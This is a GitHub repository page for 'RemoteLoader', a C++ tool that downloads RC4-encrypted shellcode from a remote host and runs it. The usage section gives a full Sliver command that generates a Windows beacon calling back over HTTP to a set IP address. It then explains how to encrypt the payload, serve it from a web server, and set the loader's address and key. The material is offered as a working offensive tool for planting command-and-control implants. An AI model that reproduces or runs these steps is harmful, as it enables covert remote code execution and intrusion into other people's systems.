Skip to content

shanekhantaun9/RemoteLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

RemoteLoader

Just another shellcode loader from remotely using rc4 encryption.

Usage

Generate a sliver's beacon

generate beacon --seconds 10 --jitter 3 --os windows --arch amd64 --format shellcode --http 192.168.70.128 --name redteam --save /tmp/shellcode.bin -G --skip-symbols

Encrypt it with rc4.py script

python3 rc4.py yourkey shellcode.bin

We will get shellcode.bin.enc file, run python web server and modify your ip address, port and key in RemoteLoader.cpp.

About

C++ remotely shellcode loader using rc4 encryption

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published